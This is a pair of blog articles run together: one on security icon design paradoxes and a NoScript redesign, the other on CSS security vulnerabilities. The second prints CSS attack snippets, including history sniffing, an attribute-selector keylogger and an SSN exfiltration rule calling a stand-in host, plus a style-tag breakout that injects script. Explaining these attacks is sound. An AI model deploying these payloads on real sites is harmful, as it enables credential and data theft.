The iconography of security

Congratulations, you’re locked out! The paradox of security visuals

As designers of technology, we’re fortunate to have an established visual language at our fingertips. We try to use colors and symbols in a way that is consistent with people’s existing expectations. When a non-designer asks a designer to “make it intuitive,” what they’re really asking is, “please use elements people already know, even if the concept is new.”

Lots of options for security icons

We’re starting to see more consistency in the symbols that tech uses for privacy and security features, many of them built into robust, standardized icon sets and UI kits. To name a few: we collaborated with Adobe in 2018 to create the Vault UI Kit, which includes UI elements for security, like Touch ID login and sending a secure copy of a file. Adobe has also released a UI kit for cookie banners.

A screenshot of an activity log.
Activity log from the Vault Secure UI Kit, by Adobe and Simply Secure.
A screenshot of a bright green cookie alert banner.
Cookie banner, from the Cookie Banner UI Kit, by Adobe.

Even UI kits that aren’t specialized in security and privacy include icons that can be used to communicate security concepts, like InVision’s Smart Home UI Kit. And, of course, nearly every icon set has security-related symbols, from Material Design to Iconic.

Five icons related to security, including a key, shield and padlock.
Key, lock, unlock, shield, and warning icons from Iconic.
Ten icons related to security, including more shields and padlocks.
A selection of security-related icons from Material Design.
A screenshot of a shield graphic being used in different apps.
Security shields from a selection of Chinese apps, 2014. From a longer essay by Dan Grover.

Many of these icons allude to physical analogies for the states and actions we’re trying to communicate. Locks and keys; shields for protection; warning signs and stop signs; happy faces and sad faces. Using these analogies helps build a bridge from the familiar, concrete world of door locks and keyrings to the unfamiliar, abstract realm of public- and private-key encryption.

A photo of a set of keys.
flickr/Jim Pennucci
A screenshot of a dialog from the GPG keychain app.
GPG Keychain, an open-source application for managing encryption keys. Image: tutsplus.com

When concepts don’t match up

Many of the concepts we’re working with are pairs of opposites. Locked or unlocked. Private or public. Trusted or untrusted. Blocked or allowed. Encouraged or discouraged. Good or evil. When those concept pairs appear simultaneously, however, we quickly run into UX problems.

Take the following example. Security is good, right? When something is locked, that means you’re being responsible and careful, and nobody else can access it. It’s protected. That’s cause for celebration. Being locked and protected is a good state.

An alert with a shield icon with a green tick that says 'account locked'.
“Congratulations, you’re locked out!”

Whoops.

If the user didn’t mean to lock something, or if the locked state is going to cause them any inconvenience, then extra security is definitely not good news.

Another case in point: Trust is good, right? Something trusted is welcome in people’s lives. It’s allowed to enter, not blocked, and it’s there because people wanted it there. So trusting and allowing something is good.

An alert with a download icon asking the user whether to trust this file, followed by an alert with a green download icon saying 'success'.
“Good job, you’ve downloaded malware!”

Nope. Doesn’t work at all. What if we try the opposite colors and iconography?

An alert with a download icon asking the user whether to trust this file, followed by an alert with a red download icon saying 'success'.

That’s even worse. Even though we, the designers, were trying both times to keep the user from downloading malware, the user’s actual behavior makes our design completely nonsensical.

Researchers from Google and UC Berkeley identified this problem in a 2016 USENIX paper analyzing connection security indicators. They pointed out that, when somebody clicks through a warning to an “insecure” website, the browser will show a “neutral or positive indicator” in the URL bar – leading them to think that the website is now safe. Unlike our example above, this may not look like nonsense from the user’s point of view, but from a security standpoint, suddenly showing “safe/good” without any actual change in safety is a pretty dangerous move.

The deeper issue

Now, one could file these phenomena under “mismatching iconography,” but we think there is a deeper issue here that concerns security UI in particular. Security interface design pretty much always has at least a whiff of “right vs. wrong.” How did this moralizing creep into an ostensibly technical realm?

Well, we usually have a pretty good idea what we’d like people to do with regards to security. Generally speaking, we’d like them to be more cautious than they are (at least, so long as we’re not trying to sneak around behind their backs with confusing consent forms and extracurricular data use). Our well-intentioned educational enthusiasm leads us to use little design nudges that foster better security practices, and that makes us reach into the realm of social and psychological signals. But these nudges can easily backfire and turn into total nonsense.

Another example: NoScript

“No UX designer would be dense enough to make these mistakes,” you might be thinking.

Well, we recently did a redesign of the open-source content-blocking browser extension NoScript, and we can tell you from experience: finding the right visual language for pairs of opposites was a struggle.

NoScript is a browser extension that helps you block potential malware from the websites you’re visiting. It needs to communicate a lot of states and actions to users. A single script can be blocked or allowed. A source of scripts can be trusted or untrusted. NoScript is a tool for the truly paranoid, so, in general, it wants to encourage blocking and not trusting. But:

“An icon with a crossed-out item is usually BAD, and a sign without anything is usually GOOD. But of course, here blocking something is actually GOOD, while blocking nothing is actually BAD. So whichever indicators NoScript chooses, they should either aim to indicate system state [allow/block] or recommendation [good/bad], but not both. And in any case, NoScript should probably stay away from standard colors and icons.”

So we ended up using hardly any of the many common security icons available. No shields, no alert! signs, no locked locks, no unlocked locks. And we completely avoided the red/green palette to keep from taking on unintended meaning.

Navigating the paradox

Security recommendations are built into most digital services nowadays. As we move into 2020, we expect to see a lot more conscious choices around colors, icons, and words related to security. For a start, Firefox has already taken a step in the right direction by streamlining its indicators for SSL encryption as well as content blocking. (Spoiler: they avoided adding multiple dimensions of indicators, too!)

The most important thing to keep in mind, as you’re choosing language around security and privacy features, is: don’t conflate social and technical concepts. Trusting your partner is good. Trusting a website? Well, could be good, could be bad. Locking your bike? Good idea. Locking a file? That depends.

Think about the technical facts you’re trying to communicate. Then, and only then, consider whether there’s also a behavioral nudge you want to send, and if there is, try to poke holes in your reasoning. Is there ever a case where your nudge could be dangerous? Colors, icons, and words give you a lot of control over how exactly people experience security and privacy features. Using them in a clear and consistent way will help people understand their choices and make more conscious decisions around security.

CSS security vulnerabilities

Don’t read that headline and get worried. I don’t think CSS is a particularly dangerous security concern and, for the most part, I don’t think you need to worry about it.

But every once in a while, an article circulates and gets some attention by pointing out things CSS can do that might surprise or worry you.

Here’s a little roundup.

The Visited Link Concern

This one goes like this:

  1. You put a link to a particular page on your site, say, Tickle Pigs
  2. You style the visited state of that link, like a:visited { color: pink; }, which is not a default user agent style.
  3. You test the computed style of that link.
  4. If it’s pink, this user is a pig tickler.
  5. You report that pig-tickling information back to some server somewhere and presumably triple their pig-owning insurance rates, as surely the pigs will suffer extreme emotional distress over all the tickling.

You might even be able to do it entirely in CSS, because that :visited style might include something like background-image: url(/data-logger/tickle.php), which is only requested by pig ticklers.
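
Putting that together, the all-CSS version might look something like this (a sketch of the now-blocked attack; /data-logger/tickle.php is this article’s made-up endpoint):

a:visited {
  color: pink;
  /* only visitors with Tickle Pigs in their history would ever request this */
  background-image: url(/data-logger/tickle.php);
}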

Worried? Don’t be: browsers have all prevented this from being possible. They limit which properties :visited styles can change and lie about the result in getComputedStyle, so neither the style test nor the background-image trick works anymore.

The Keylogger

This one goes like this:

  1. There is an input on the page. Perhaps a password input. Scary!
  2. You set the input’s background image to a logging URL, keyed off the input’s value with an attribute selector, plus a billion more selectors just like it, such that the logger will collect and report some or all of the password.
input[value^="a"] { background: url(logger.php?v=a); }
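
That first rule only catches the first character; the billion other selectors extend the matched prefix one character at a time (logger.php being the hypothetical collection endpoint):

input[value^="aa"] { background: url(logger.php?v=aa); }
input[value^="ab"] { background: url(logger.php?v=ab); }
input[value^="ac"] { background: url(logger.php?v=ac); }
/* …and so on, one rule for every prefix worth capturing */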

This one isn’t that easy to pull off. The value attribute of an input doesn’t change just because you type into it. It does in some frameworks, like React, though, so if you were to slip this CSS onto a login page powered by React and coded in that way, then, theoretically, this CSS-powered keylogger could work.

But… in that case, JavaScript is executing on that page anyway. JavaScript is 1000× more concerning than CSS for things like this. A keylogger in JavaScript is just a couple of lines of code watching for keypress events and reporting them via Ajax.

Third-party and XSS-injected inline JavaScript is now stoppable with Content Security Policy (CSP)… but so is CSS.
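
For instance, a policy roughly like this (a minimal sketch, not a production config) allows only same-origin stylesheets and scripts, so injected inline style and script blocks are both refused:

Content-Security-Policy: style-src 'self'; script-src 'self'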

The Data Thief

This one goes like this:

  1. If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
  2. And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
  3. I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }

A billion selectors and you’ve covered all the possibilities!
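
Although, to be fair, you don’t need anywhere near a billion rules if you match prefixes a character at a time, like the keylogger above: ten rules reveal the first digit (reusing the article’s secret-site.com logger), and each digit after that takes ten more rules per known prefix, or a freshly served stylesheet per round:

input#ssn[value^="0"] { background: url(https://secret-site.com/logger.php?v=0); }
input#ssn[value^="1"] { background: url(https://secret-site.com/logger.php?v=1); }
/* …through "9"; once the first digit is known, repeat for the next position */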

The inline style block whoopsie

I don’t know if I’d blame CSS for this necessarily, but imagine:
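
Something like this, say, where a user’s saved theme styles are echoed straight into a style block (a hypothetical sketch; the exact templating syntax doesn’t matter):

<style>
  body { background: #fff; }
  /* user-saved CSS dropped in verbatim */
  <?php echo $user_theme_css; ?>
</style>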

Perhaps you’re allowing the user some CSS customization there. That’s an attack vector, as they could close that style tag, open a script tag, and write nefarious JavaScript.
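
A saved “theme” like this hypothetical payload would break right out of the style block:

</style><script>/* nefarious JavaScript runs here, stealing cookies or worse */</script>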

I’m sure there are a bunch more

Got ’em? Share ’em.

Color me a little skeptical of how terrified I should be about CSS security vulnerabilities. I don’t wanna downplay security things too much (especially third-party concerns) because I’m not an expert and security is of the utmost importance, but at the same time, I’ve never once heard of CSS being the attack vector for anything outside of a thought exercise. Educate me!